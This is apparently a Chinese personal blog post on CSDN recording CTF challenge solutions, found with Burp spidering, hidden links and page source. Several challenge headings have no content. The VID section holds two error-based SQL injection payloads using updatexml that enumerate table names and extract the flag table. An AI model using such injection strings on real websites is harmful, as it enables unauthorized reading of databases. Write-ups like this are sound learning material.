记ctf实战

最近本姑娘着迷ctf类竞赛,有志同道合的小伙伴可以留言一起来做点趣味题目呢

此网站第一道题目如下

一、robot

1,先进网站,发现了一张萌萌哒的图片,相信许多人和本姑娘一样,第一反应是load图片查看代码里面有没有猫腻,然而其实什么也木有呢。本姑娘就第一时间抓了包,用的burp你懂的。


2,本姑娘在burp里面稍微找了一下,因是第一道题,着实没有什么难处,在spider发现了如下东西,就是本题解题思路啦

3,直接输入找的线索,得到小旗旗



二、ipspoofing

1,打开页面,发现是个页面,本姑娘按照一般思路看了下源代码没发现可疑之处,于是抓包。

2,抓包后右键到spider想找找页面信息,不了突然跳出了如图所示的东西,甚为惊喜,上面给了登录网址,密码用户名,本姑娘快速访问链接


3,后来再浏览文件时发现页面最下方有链接提示,直接可进入登录页面

4,激动人心的最后一步,本姑娘输入了spider里面的用户名和密码登录不成功,立刻看源码,如图看到登录的username和password



三、seelog

1,第三个题目有点意思,本姑娘回头想想答案全在题目里面

首先看着页面see blog 看到这里本姑娘一直在头脑风暴,势必记住看blog ,打开网址。


2,网页是非请勿入,本姑娘,依然先看源代码,再抓包都没有什么重大发现

3,纠结了半天,发现猫腻都在blog 里面,本姑娘在网页后面加了一个blog 出现了如图所示的东西



4,打开第一个文件,查看blog 在这里科普两个小常识,

(1)一些常见的状态码为:

  • 200 – 服务器成功返回网页
  • 404 – 请求的网页不存在
  • 503 – 服务器超时
(2)Ctrl+F快捷键查看

终于找到了图示的链接


5,输入提示的链接成功拿到小旗旗


四、phpinfo






五、VID











number=0&username=%00' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#&password=123&submit=Submit+Query  //爆表

number=0&username=%00' and updatexml(1,concat(1,substr((select * from flag),1,15)),1)#&password=123&submit=Submit+Query   //爆flag



六、GetFlag


七、天下武功唯快不破


八、pyscript



九、fuzzing



十、blog


发布了2 篇原创文章 · 获赞 2 · 访问量 1844
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览